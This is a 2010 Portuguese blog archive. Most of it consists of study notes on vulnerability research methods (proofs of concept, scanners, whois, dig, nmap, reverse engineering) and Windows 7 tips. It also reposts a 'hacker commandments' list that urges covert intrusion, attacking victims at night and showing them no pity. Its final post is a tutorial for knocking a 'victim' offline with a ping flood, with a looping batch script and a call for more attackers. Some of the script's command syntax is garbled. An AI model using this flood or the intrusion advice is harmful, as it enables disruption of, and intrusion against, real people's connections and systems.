Este é o padrão apresentado slide 1 título

Aqui você adiciona uma descrição do post em destaque.

Este é o padrão apresentado slide 2 título

Aqui você adiciona uma descrição do post em destaque.

Este é o padrão apresentado slide 3 título

Aqui você adiciona uma descrição do post em destaque.

Este é o padrão apresentado slide 4 título

Aqui você adiciona uma descrição do post em destaque.

Este é o padrão apresentado slide 5 título

Aqui você adiciona uma descrição do post em destaque.

domingo, 30 de maio de 2010

Métodos para Testar Vulnerabilidades

Citação:
A. Prova de Conceito
B. Código de Exploração
C. Ferramentas Automatizadas
D. Versioning

Prova de Conceito:

1. Usado para demonstrar a existência de uma vulnerabilidade.

2. Fornecido por um fornecedor ou um pesquisador em um fórum aberto.

3. É uma demonstração do problema através de um bloco pequeno de código que não explora um sistema em benefício do atacante.

4. Não é um descrição que mostra ao usuário como reproduzir o problema.

5. Usada para identificar a origem do problema e recomendar uma solução.

6. Usada para notificar a comunidade de segurança, sobre um problema.

7. O objetivo é ganhar tempo entre o momento em que a vulnerabilidade é anunciada e o momento em que usuários maliciosos começam a produzir código para tirar proveito dessa vulnerabilidade e lançar ataques.

8. Um fornecedor é beneficiado a fim de que tenha tempo para produzir e lançar um path para o problema.

Código de Exploração:
1. Um programa escrito para tirar vantagem de um problema em alguma parte de um software.

2. É elaborado para mostrar mais detalhes de como uma vulnerabilidade pode ser explorada.

3. Pode ser escrito em várias linguagens.

4. Fornece à comunidade de segurança, um programa para demonstrar uma vulnerabilidade, produzir algum ganho para o usuário executando o programa.

5. Também torna possível o ataque a sistemas por usuários maliciosos.

6. Oferece clareza na exploração da vulnerabilidade e motivação para fornecedores produzirem um patch.

7. Lançar uma exploração funcional significa lançar um programa que tire proveito de um problema.

8. Fóruns que divulgam detalhes técnicos sobre uma vulnerabilidade e compartilham explorações funcionais são observados por muitos membros, todos com as suas motivações.

Ferramentas Automatizadas:
1. São pacotes de software criados por fornecedores para permitir testes de segurança (descobertas de vulnerabilidades) de forma automática.

2. Geram relatórios sobre lista detalhada dos problemas de vulnerabilidades com o sistema.

3. Permitem usuários legítimos realizarem auditorias para controlarem o andamento da proteção do sistema.

4. Usuários maliciosos, com a mesma ferramenta, podem identificar vulnerabilidades em hosts.

5. Usuários com pouco conhecimento técnico têm a capacidade de identificar e proteger seus hosts.

6. Gratuitamente disponível existe a Nessus (software livre para varredura de vulnerabilidades) da Nessus Project (www.nessus.org).

7. De código proprietário temos: CyberCop Segurity Scanner (Network Associates), NetRecon (Symantec), Internet Scanner (Internet Security Systems), IIS-Scan (…), Languard-Scanners (…), Iris (…).

Versioning:
1. Consiste em identificar versões ou revisões de software que um sistema está usando.

2. Muitos pacotes de software possuem uma versão (Windows 2000 Professional ou Solaris 8).

3. E muitos pacotes de software incluídos em um software versionalizado, também incluem uma versão (como uma distribuição LINUX, que é uma coleção de pacotes de software, cada um com sua próprias versões).

4. O método consiste na observação de uma lista de pacotes de software com versões anunciadas contendo vulnerabilidades, por um fornecedor.

5. Um método de realizar Versioning é executar o comando de versão em um pacote de software:

6. Como, por exemplo, o comando uname –a que fornece a revisão de kernel rodando em uma máquina LINUX.

7. Outro modo é usar uma ferramenta de gerenciamento de patch, provida por um fornecedor para verificar o software pela última versão.

8. Por exemplo, executar a ferramenta showrev –p em um sistema SUN SOLARIS).

Citação:
Identificando métodos para coleta de “inteligência”
Técnicas de Pesquisa Comum:
- Whois
- baseado em serviço de nomes,
- baseado em serviço de rede.
- DNS
- Ferramenta Dig
- Ferramenta nslookup

Whois:
1. Um banco de dados Whois é uma coleção de informações gratuitamente disponível na Internet.

2. Destinada a manter informações de contato para recursos de rede.

3. Existem vários: Whois.com, Whois.biz, e o banco da American Registry of Internet Numbers, contendo informações baseadas em serviço de nome (datalhes sobre um domínio) e baseadas em serviço de rede (informações sobre o gerenciamento de redes).

Whois baseado em serviço de nomes:
1. Fornecem diversos detalhes sobre um domínio.

2. Dados são fornecidos para facilitar a comunicação entre proprietários de domínio, no caso de um problema.

3. É o método apropriado para tratar os problemas que surgem, embora a tendência hoje pareça ser primeiro incomodar o provedor sobre um problema.

4. Nomes de domínio podem ser registrados através de diferentes registrars competindo:

5. ENOM é um registrar, uma empresa que faz registros de informações sobre domínios em bancos de dados Whois.

6. Em um banco de dados Whois baseado em serviço de nomes pode-se ver:

7. - informações de contato do proprietário de um domínio, como o nome, telefone, fax, endereço postal,
a. servidores de nome de domínio.

8. Esses dados podem proporcionar a um usuário um método para atacar e controlar um domínio.

9. Dados fornecidos incluem os servidores de nomes de domínio (DNS).


Whois baseado em serviço de rede:
1. Fornecem detalhes das informações de gerenciamento de redes.

2. Esses dados podem auxiliar o pessoal de rede e de segurança, com informações para localizar um host, se um problema ocorrer.

3. Fornece dados como o provedor de contato dos endereços de rede, e em alguns casos, alguma empresa alugando esse espaço de endereçamento.

4. Em um banco de dados Whois baseado em serviço de rede, pode-se obter:
a. - um espaço de endereços de rede (66.38.151.0 à 66.38.151.63)
b. - proprietário desse espaço de endereços (por exemplo, uma empresa ou grupo empresarial) e ou em alguns casos uma empresa ocupando (alugando) esse espaço.

5. Essas informações podem dar a um atacante as fronteiras para um possível ataque.

6. Por exemplo, para obter informações: prompt:> whois –h whois.arin.net 66.38.151.10

7. ARIN Registration Services

8. Usar servidor Whois em rs.internic.net para informação relacionada a registros de domínios (Internet’s Network Information Center).

9. Usar whois.nic.mil para informação sobre NIPRNET (Internet Protocol Router Network) .

Ferramenta dig:
1. Disponível gratuitamente, distribuído como parte do pacote BIND (Berkeley Internet Name Domain) do Internet Software Consortium.

2. Coleta informações dos servidores de DNS.

3. Usado para traduzir nomes dos hosts em endereços IP, ou vice-versa.

4. Muitas explorações não possuem a capacidade de traduzir os nomes dos hosts e precisam de endereços numéricos para funcionar.

5. Usado para para obter informações de versão de servidores DNS.

6. Prompt:> dig @pi.cipherpunks.com TXT CHAOS version.bind

7. TXT CHAOS version.bind são parâmetros para a busca do dig.

8. Os dados de nomeação do DNS são divididos em zonas.

9. Dig pode realizar outros serviços de DNS, como por exemplo, uma transferência de zona, que é uma função do DNS para distribuir registros de serviço de nomes a outros hosts.

10. A base de dados do DNS é distribuída através de uma rede lógica de servidores.
11. Cada servidor DNS retém parte da base de nomes, principalmente os dados para o domínio local.

12. Algumas das consultas são relativas a computadores no domínio local e são resolvidas por servidores dentro do domínio.

13. Contudo, cada servidor registra os nomes dos domínios e endereços de outros servidores de nomes, de modo que consultas para fora do domínio podem ser resolvidas.

14. Efetuando manualmente uma transferência de zona, um atacante pode ganhar informações valiosas sobre sistemas e endereços gerenciados por um servidor de nomes DNS.

Ferramenta nslookup:
1. nslookup é acrônimo de Name Service Lookup.

2. Gratuita no Internet Software Consortium.

3. Procura informações nos hosts através do DNS e retorna informações sobre um domínio.

4. Prompt:> nslookup

Citação:
Identificando métodos para coleta de “inteligência” II
1. Nmap

2. Indexação Web


Network Mapper:
1. Para um atacante ganhar acesso a um host, ele precisa ser lançado contra um serviço rodando no host.

2. O serviço precisa ser vulnerável a um problema que permitirá ao atacante ganhar acesso.

3. É possível descobrir que serviços o host utiliza, através de alguns métodos de coleta de “inteligência”.

4. Também é possível sondar portas em um host, com utilitários como netcat para saber se uma conexão pode ser feita com o serviço.

5. O processo de coletar informações sobre serviços disponíveis em um host é simplificado por ferramentas como o Network Mapper (Nmap).

6. O Nmap identifica os serviços abertos, públicos e os serviços que estão sendo filtrados por TCP Wrappers ou firewalls.

7. Prompt:> nmap –sS –O derivative.cipherpunks.com

8. Os flags -sS e -O instruem o Nmap a conduzir um scan SYN no host e identificar o sistema operacional através de respostas IP recebidas.

Indexação Web:
1. Conhecida como spidering.

2. Programas automatizados para vasculhar sites (conjunto de páginas) e indexar os dados de links de páginas desses sites para um banco de dados:

3. spiders, crawlers, agents, …

4. Esses programas visitam determinados sites, seguem links em páginas, e registram os dados desses links de cada página “visitada”.

5. spiders, crawlers, agents, …

6. Esses programas visitam determinados sites, seguem links em
páginas, e registram os dados desses links de cada página “visitada”.

7. Os dados obtidos (referentes aos links) são indexados e referenciados em um banco de dados relacional, e associados ao mecanismo de busca.

8. Quando um usuário visita um portal (Yahoo, WebCrawler, Google, AltaVista, Miner, …), a pesquisa de palavras-chave retornará vários links para uma página indexada.

9. Mas, o que acontece quando informações vitais contidas em um site não são armazenadas com controle de acesso apropriado?

10. Como os dados dos sites estão em arquivos, e se esses arquivos não estão suficientemente protegidos, isso pode permitir que um atacante ganhe acesso às informações do site e obtenha
“inteligência”, através do mecanismo de busca.


Extração de Páginas Web:
1. Ferramentas como a wget, podem ser usadas para extrair recursivamente todas as páginas de um site.

2. O processo é bem simples. Com wget :

3. prompt:> wget –m –x http://www.mrchal.com

4. O flag -m (mirror) diz a wget para baixar todos os arquivos dentro do site www.mrhal.com seguindo os links.

5. O flag -x preserva a estrutura de diretório do site quando for baixado.

6. Este tipo de ferramenta pode permitir a um atacante espelhar um site.

7. Um outro programa, chamado grep http://www.gnu.org/software/grep/grep.html

8. permite que um atacante procure links que possam ser de interesse.


Citação:
Problemas de Pesquisa de Vulnerabilidades
1. Existem várias maneiras de se abordar um problema.

2. Qual delas escolhemos depende dos recursos disponíveis e da metodologia com que estamos mais acostumados.

Recursos:
1. No caso de pesquisa de vulnerabilidades: os recursos são:
a. - código,
b. - ferramentas,
c. - tempo.


Métodos:
1. Pesquisa de Código-Fonte

2. Engenharia Reversa

3. Caixa-Preta

Vulnerabilidade:
1. Uma vulnerabilidade é um problema, explorável ou não, estando ela em um sistema operacional, um banco de dados, na lógica de uma aplicação ou numa interface Web.

Pesquisa, Metodologia:
1. Pesquisa é o processo de se reunir informações que podem levar ou não à descoberta de uma vulnerabilidade.

2. Metodologia é o conjunto de métodos recomendados, que podem ser usados para pesquisar vulnerabilidades.


Amplitude de Métodos e Ferramentas:
1. Do entusiasta de segurança doméstico ao auditor de código corporativo, os métodos e ferramentas são os mesmos.

2. Métodos variando de deduções a métodos científicos, …

3. Ferramentas variando de editores hexa a desassembladores de código, …

Escolha do Método:
1. Pesquisadores menos experientes podem preferir um método mais organizado de pesquisar vulnerabilidades.

2. Pesquisadores mais experientes em programação podem confiar mais no seu sentimento.

3. A escolha é uma questão pessoal.

4. Tipos de código diferentes exigem métodos de pesquisa diferentes : manipular código binário requer um método muito diferente de manipular código-fonte.

Observação:
1. Existem diversos esquemas de organização diferentes que são usados pelos pesquisadores na comunidade de segurança ao pesquisar vulnerabilidades.

2. Esses esquemas são variados.

3. Alguns pesquisadores confiam em auditorias metódicas, com organização pré-estabelecida, realizadas parte-por-parte.

4. Ou outros métodos consistentes, mas com uma organização subjetiva.

5. Existem gratuitamente disponíveis diversos pacotes de rastreamento de vulnerabilidade e de rastreamento de auditoria de software.

6. Bugzilla oferece diversos recursos e uma interface. Ver em http://bugzilla.mozilla.org/

Pesquisa de Código-Fonte:
1. O código-fonte pode ser escrito em qualquer linguagem: C, Perl, Java, C++, ASP, PHP, …

2. A pesquisa começa geralmente com a procura de funções propensas a erro.


Descoberta por diferença:
1. Método usado para se descobrir as vulnerabilidades de um pacote.

2. Tipo de pesquisa utilizado quando um fornecedor corrige uma vulnerabilidade em um pacote, mas não disponibiliza detalhes sobre o problema.

3. O método determina se um arquivo-fonte foi alterado, e se foi, que partes do arquivo foram alteradas de uma versão para outra.

4. Utilitário usado neste tipo de pesquisa: diff

5. http://www.gnu.org/software/diffutils/diffutils.html

6. diff é distribuído com a maioria dos sistemas operacionais UNIX.

7. Também disponível para outras plataformas através, por exemplo, da Free Software Foundation.

8. Usada em arquivos-fonte para mostrar as diferenças exatas entre as bases-fontes.

9. Ver exemplo, livro Ryan Russel, pag. 84-85.

10. Fornecedor provê um patch que seja um diff entre duas bases-fonte, como em FreeBSD. Ver exemplo, por Ryan Russel, pag. 85.


Pesquisa por Código-Fonte II:
1. Com a GNU License e movimentos de fontes aberta (open source), a opção de se obter o código-fonte é mais viável.

2. Mas, nem todos os fornecedores abraçaram esse movimento e muitos pacotes de software permanecem com fonte-fechada.

Funções Propensas a Erro:
1. Funções das próprias linguagens.

2. Na linguagem C, temos strcpy, sprintf ou mktemp.

3. Essas funções C são normalmente exploradas ou usadas impropriamente para realizar atividades maliciosas.

4. O usos das funções strcpy, sprintf pode resultar em transbordamento de buffer (buffer overflow), devido à falta de verificação de limite (o que é armazenado é maior do que a área reservada) que .

5. Exemplos: livro Ryan Russel, pag.88-91:
a. strcpy (c, b);
b. sprintf (c, “%s”, b);
c. strcat (c, b);
d. gets (c);

6. A função mktemp pode resultar em race conditions (condições de corrida) exploráveis como substituição de arquivos e elevação de privilégios. Ver no exemplo, livro Ryan Russel, pag. 93.

Race Conditions
1. São erros de programação comuns definidos como uma situação onde alguém pode adulterar um programa para um determinado evento.

2. Eventos podem ser desde bloquear a memória para evitar que outro processo altere os dados, em um segmento compartilhado, até a criação de um arquivo no sistema de arquivos.

3. Exemplo: Livro Ryan Russel, pag.93,
o Caso “race condition” ocorre entre a verificação da existência de um nome de arquivo e a criação do arquivo.

o A limitação da quantidade máxima de nomes que o arquivo pode usar pode resultar em um ataque de link simbólico.

Bugs de Validação de Entrada:
1. Esse tipo de problema pode resulatar em vulnerabilidades de string de formato.

2. Uma vulnerabilidade de string de formato consiste em passar vários especificadores de string, como:
a. - %i%i%i%i ou,
b. - %n%n%n%n, … …

3. … … para um programa, possivelmente, resultando na execução do código.

4. Exemplo: Livro Ryan Russel, pag. 91-92.

5. A inexistência de validação de entrada, pode permitir que um usuário explore programas como:
a. executáveis de raiz setuid
i. (com privilégio de usuário root)

b. interfaces de aplicações Web,
c. execução de comandos SQL arbitrários, na comunicação entre um front-end Web e um back-end de banco de dados SQL fazendo-os funcionar mal pela passagem de parâmetros inadequados para eles.

6. executáveis de raiz setuid,
a. - conduzem a exploração para executar código com privilégio de usuário root.

7. interfaces de aplicações Web,
a. - isso pode permitir que alguém execute
b. comandos arbitrários em um sistema
c. com os privilégios de usuário Web,
d. - permitir a um usuário vincular um shell
e. a uma porta arbitrária no sistema e ganhar
f. acesso local com permissões do processo
g. HTTP.

8. execução de comandos SQL arbitrários, na comunicação entre um front-end Web e um back-end de banco de dados SQL:
a. - o usuário pode ver tabelas arbitrárias;
b. - executar funções dentro do banco de dados;
c. - baixar tabelas.


Técnicas de Engenharia Reversa:
1. Localizar vulnerabilidades em programa de fonte fechada.

2. Pode ser realizada com diversas ferramentas, conforme o sistema operacional.

3. Em geral, começa-se com algumas ferramentas de monitoramento sistema operacional para determinar que tipos de arquivos e outros recursos o programa acessa.

4. Uma exceção é se o programa for um programa de rede, caso em que se pode ir direto ao sniffing.

5. Fonte de ferramentas para Windows é www.sysinternals.com .

6. Ferramentas de interesse:
a. FileMon
b. RegMon

7. Mais sobre essas ferramentas no Cap. 5 sobre Diferenciação.

8. FileMon e RegMon permitirão monitorar um programa em execução, para ver que arquivos estão sendo acessados, se o programa está lendo ou gravando, onde no arquivo ele está e que outros arquivos ele está procurando.

9. Existem três versões de quase todas as ferramentas da SysInternals, e a maioria vem com código-fonte.

10. www.Winternals.com vende ferramentas para Windows com mais funcionalidade incluída.

11. A maioria das distribuições UNIX vem com um conjunto de ferramentas equivalentes.

12. Em Rosetta Stone, http://bhami.com/rosetta.html , existe uma grande quantidade de ferramentas de rastreamento.

13. Ferramentas UNIX: trace, strace, ktrace e truss.

14. Ver exemplo, com strace no Linux Red Hat 6.2, pag. 95-100.

15. A tarefa do strace (e das outras ferramentas) é mostrar chamadas de sistema (kernel) e seus parâmetros.

16. Pode-se aprender muito sobre como um programa rastreado funciona, usando-se ferramentas de rastreamento.

17. Os exemplos em no livro Ryan Russel,

18. pag. 95-100, demonstram o que você pode aprender pedindo ao sistema operacional para lhe dizer o que ele está fazendo na execução de um programa sendo rastreado.

19. Para um programa complexo estaríamos procurando arquivos em /tmp de nome fixo, leitura de arquivos graváveis por qualquer pessoa, quaisquer chamadas exec, e assim por diante.

Pesquisa de Código Binário:
1. Rastrear a execução de um programa.

2. Ferramentas para executar essa tarefa:
a. truss com o Solaris (SUN),
b. strace com o LINUX

3. Rastrear um programa envolve como a execução do programa interage com o sistema operacional.

4. As variáveis de ambiente extraídas pelo programa podem ser reveladas com flags da ferramenta de rastreamento.

5. Endereços de memória podem ser revelados.

6. Rastrear um programa através de sua execução pode revelar informações sobre vulnerabilidades em certos pontos do programa.

7. O uso do rastreamento pode determinar onde e quando uma vulnerabilidade ocorre.

Depuradores:
1. Debuggers

2. Método de se pesquisar vulnerabilidades dentro de um programa, enquanto ele é executado.

3. Várias implementações de debuggers.

4. GNU Debugger (GDB).

5. Controlam o fluxo de execução enquanto o programa roda.

6. O programa inteiro pode ser depurado, ou partes dele.

7. Exibem informações como: registradores, endereços de memória e
outras que podem levar à descoberta de um problema explorável.

8. Param em certos pontos na execução, mudam variáveis, e alteram dinamicamente o código de máquina em alguns casos.

Desassembladores:
1. Obtém código binário e o transforma em alguma linguagem de mais alto nível, geralmente em uma linguagem Assembly.

2. É preciso ser capaz de se ler o código em Assembly.

3. Um “desassemblador” para Windows é o IDA Pro (DataRescue).

4. “Desassembla código para várias famílias de processadores, inclusive o Java Virtual Machine.

5. Versão de avaliação limitada está em www.datarescue.com/idabase/ida.htm

6. SoftICE (Numega), www.compware.com/products/numega/drivercentral

7. Outras ferramentas relacionadas:
a. nm e objdump da coleção GNU binutils.

8. objdump manipula arquivos binários: exibe cabeçalhos, símbolos em arquivo binário, e “desassembla” em código assembly.

9. nm é similar e permite ver símbolos referenciados por um arquivo binário.

Auditoria baseada em Regras:
1. Documentos de projeto são usados:
a. diagramas de engenharia de software,
b. folhas de informações,
c. especificações como em RFCs.

2. A auditoria é feita através da verificação da conformidade do código com sua especificação no projeto.

3. Examinando a especificação de um protocolo é possível testar serviços comparando-os com sua especificação.

4. Além disso, aplicar tipos de ataques conhecidos (buffer overflow ou strings de formato) em certas partes da implementação, pode conduzir a verificação da vulnerabilidade.

Citação:
Sniffers:
1. Uso de sniffers como ferramentas de pesquisa de vulnerabilidades.

2. Podem ser usados em redes para monitorar a interatividade entre os usuários na rede e os serviços providos por sistemas.

3. Isso possibilita a observação e a representação de tendências que ocorrem no uso de pacotes que provêem serviços.

4. Trabalham em conjunto com a auditoria baseada em regras.

5. Podem ser usados na pesquisa de vulnerabilidades de interfaces Web (bugs de validação de entrada) ou em protocolos de rede não especificados por padrão público, mas comumente usados.

Essential NetTools

Essential NetTools é um conjunto de ferramentas para segurança, monitoramento e administração de redes, muito útil para diagnósticos e controle das conexões. É excelente para qualquer pessoa que esteja interessada num kit de ferramentas para dia a dia virtual. O programa exibe uma lista de conexões da rede, informando TCP, portas UDP, endereço de IP e status da conexão. Possui também um scanner avançado de TCP que permite procurar suas portas ativas.

O software inclui uma utilidade NetStat que exibe as conexões e portas abertas, mapeando-as ao aplicativo proprietário. Também conta com um scaneamento rápido da NetBIOS, ferramentas para checagem de segurança da rede e um monitorador de conexões externas para os recursos compartilhados, assim como um monitorador de processos que exibe informações sobre aplicativos e serviços que estão sendo executados.

Outras ferramentas úteis de Essential NetTools são o Ping, TraceRoute, varredura SNMP, navegador e NSLookup. Recursos adicionais incluem a geração de relatórios em HTML, em texto e em formato delimitado por vírgulas, além de interface personalizável link para download:Link:http://www.baixaki.com.br/site/dwnld18264.htm

Mandamentos hacker(não fui eu q criei)

1. Descobriu algo novo, olhe!
2. Não apague nada! É melhor ter acesso a um provedor do que destruí-lo.
3. Não modifique nada, ao menos que queira ser descoberto.
4. Para atacar, escolha um horário entre 00:30 e 06:00.
5. Não teste vírus no seu próprio HD.
6. Tenha uma estratégia pronta antes de atacar.
7. Se possível, use os computadores de acesso público. É mais seguro!
8. Não distribua, pra ninguém, informações ou dados sobre o que você pegou.
9. Não confie em ninguém
10. Não obedeça regras ( Claro que essas Regras devem ser obedecidas ).
11. Não tenha pena de niguém.
12. Não crie laços afetivos com a vítima.
13. Aprenda o máximo que puder com quem sabe mais!
14. Você usa MS-DOS ou o Windows? Não conte a niguém...
15. Você usa UNIX ou LINUX? Certifique-se de que está bem seguro...
16. Se pegar a senha de alguém e não souber o que fazer, mate-se !
17. Uma vez dentro, tente dominar o lugar. É claro: com muita cautela !
18. Nunca tente um su ou root direto. Isso fica logado!
19. Não fique dando telnet, pegando e-mail ou utilizando o acesso dos outros.
20. Nunca substime um sysop.
21. Você deve sempre aprimorar suas técnicas. Lembre-se: "Os hackers são as pessoas mais inteligentes e estudiosas do planeta!".

sábado, 29 de maio de 2010

Como usar temas escondidos no Windows 7

O Windows 7 tem 5 temas que só estão ativos para usuários da Austrália, Canadá, Inglaterra, Estados Unidos e do continente Africano.

Estes temas apresentam imagens das regiões e inclusive foram comentadas na época em que o Windows 7 estava em fase beta, de que teriam temas regionais.
Pois bem, como estamos no Brasil não temos acesso a estes temas por padrão e estas dicas são para poderem visualizar e usar estes temas que incluem fotos magníficas de paisagens de cada região.

Para ativar os temas secretos do Windows 7:

1.Abra o “Executar” (Tecla Windows + R) ou clique em Iniciar e no campo de procurar;
2.Digite %WINDIR%\Globalization\MCT e execute.
Você será levado ao diretório MCT
Neste diretório “MCT” você verá 5 outros diretórios:
MCT-AU: Região da Austrália
MCT-CA: Região do Canadá
MCT-GB: Região da Inglaterra
MCT-US: Região dos Estados Unidos
MCT-ZA: Região da África

Basta agora entrar em um dos diretórios e logo após acessar o sub-diretório “Theme” que existe em cada um para abrir o arquivo .theme e usar o tema desejado.



Uma outra forma de chegar ao diretório MCT é pelos passos abaixo:
Abra o Explorer (Tecla Windows + E).

Logo após vá em “Organizar > Pastas e opções de buscas”.
Logo após clique na aba “Visualização” e desmarque a opção “Esconder arquivos protegidos do sistema operacional”. Logo após clique em “OK”.
Agora vá em C: (ou outra unidade que tenha instalado o windows 7) > Windows > Globalization > MCT.
Logo após usar o tema desejado, aconselho ativar novamente a opção “Esconder arquivos protegidos do sistema operacional”.

Ativando o Windows 7 pela internet ou telefone


Quando o tempo de teste do Windows 7 está expirando ou expira, devemos ativar o sistema operacional da Microsoft por telefone ou internet através de um código serial único para o sistema.

Devido a pirataria e os esforços da empresa em desativar os sistemas Windows 7 crackeados e com seriais falsas, acontece também de as vezes os sistemas com seriais legítimos serem considerados como falsos e aparecer na tela as mensagens de que provavelmente você foi enganado com uma versão pirata do Windows 7, mesmo o SO sendo original e comprado em lojas confiáveis.

Então veremos neste passo a passo, como fazer para ativar novamente o seu Windows 7 com a devida serial original, sem crack (já conheci pessoas com o SO original usarem crack por não saberem como ativar o Windows 7).

Há duas maneiras de se fazer isso, por telefone, onde se liga para o número informado na tela, digita-se a serial válida e logo em seguida se obtém um código de registro (ID) ou pela internet.

Para isso, clique no menu “Iniciar” do Windows (aquela bolinha com o símbolo do Windows redondo que fica na parte inferior da tela) e clique com o botão direito do mouse em “Computador”, escolhendo em seguida “Propriedades”.Agora clique no link “Ative o Windows agora” ou “Activate Windows now” que aparecerá logo após ter aberto a janela de propriedades do computador, conforme o passo acima. O link “Change product key” ou “Mudar a chave do produto” deverá ser usado caso queira mudar a serial key do Windows 7 (caso tenha testado o sistema e obtido a compra da licença, que nada mais é uma serial key válida).

Uma janela com uma mensagem dizendo que o Windows está verificando a chave (serial) do sistema aparecerá, bastando apenas aguardar alguns instantes.

Pronto, uma frase dizendo que o Windows foi ativado com sucesso deverá aparecer. Essa é a confirmação de que seu Windows passou pela validação e é original.

Caso tenha aparecido algum erro dizendo que a serial não é válida, você poderá tentar ativar o Windows 7 pelo telefone, onde uma secretária eletrônica virtual irá lhe atender e onde deverá digitar no telefone o ID que aparece na tela para receber o ID de confirmação vindo do telefone.

Se mesmo assim tiver dificuldades e realmente tem certeza de que seu Windows 7 é original, basta entrar em contato com o suporte da Microsoft do Brasil pelo telefone: (11) 4706 0900 em São Paulo ou 0800 761 7454 para as demais localidades, nos seguintes horários: 2ª a 6ª feira, das 8h às 20h. Sáb., Dom. e feriados, das 9h às 19h.

Prevenindo que o Windows saia do modo Sleep ao mexer no mouse


O Windows 7 possui uma série de opções de gerenciamento de energia e este foi um dos principais objetivos durante seu desenvolvimento, economizar energia para que fosse bem aceito em computadores portáteis, como notebook e netbooks.

O modo sleep (dormir) é uma ótima forma de fazer seu computador ficar semi desligado quando não for usar o computador por algumas horas. Com a função dormir (sleep), você poderá economizar energia e recursos do seu aparelho e ainda reiniciar o mesmo instantaneamente quando quiser.
Esta opção pode ser acessada indo no menu “Iniciar” do Windows e logo em seguida escolhendo a oMas esta volta do sistema pode ser feita mexendo o mouse e para quem tem mouses sensíveis, o computador poderá voltar a ativa por qualquer toque que derem nele.

Para evitar que o Windows saia do modo dormir por qualquer esbarrão que se dê no mouse, podemos desmarcar a opção “Permitir que este dispositivo acorde o computador” da propriedade do mouse.

Para isso, ante no painel de controle (Iniciar > Painel de controle) e busque por “mouse” (sem as aspas) e clique na opção “Mouse”.
pção “Sleep” ou “Dormir” no Windows em português.
Na janela que se abriu da propriedades do mouse, selecione o mouse que utiliza e logo em seguida clique no botão “Propriedades”.
Na próxima janela que abriu, clique em “Modificar configurações”.

E agora desmarque a opção “Permitir que este dispositivo acorde o computador” (Allow this device to wake the computer) e clique em OK.
Pronto, agora ao usar o modo dorminhoco (sleep) poderá mexer o mouse a vontade que o computador não irá acordar. Para acordar, basta apertar alguma tecla do teclado.

Não fiz o teste em outras versões do Windows, mas acredito que funcione também no Windows Vista, XP e outros.

Derrube pessoa pelo Msn(kk,essa é boa )

Derrube a conexão da sua vítima

Estarei ensinando a vocês a como derrubar uma pessoa pelo Dos :

Tente o seguinte comando no Prompt do MS DOS :

ping -f-l1000 -t( Ip da vítima ) ou ping -t - 11000 -f( Ip da vítima )

Ficando assim : C:\Windows>ping -f- 11000 -t( ip da vítima )

Ou

C:\Windows>ping -t - 11000 -f( Ip da vítima )

Repita esse procedimento até ele cair.

Ou

2° MÉTODO

NUCANDO.BAT

Primeiro você abre o Bloco de Notas ou o edit do MS-DOS e digite o seguinte:

@ECHO OFF
:AA
PING -F-11000 -T ip_do_cara
cls
GOTO aa

OU

@ECHO OFF
:AA
PING -t-11000 -f ip_do_cara
cls
GOTO aa

Depois você salva com a extensão .BAT e execute...

Lembre - se : Quanto mais pessoas fazendo isso junto com você, mas rápido ele irá cair.
By:Rafinha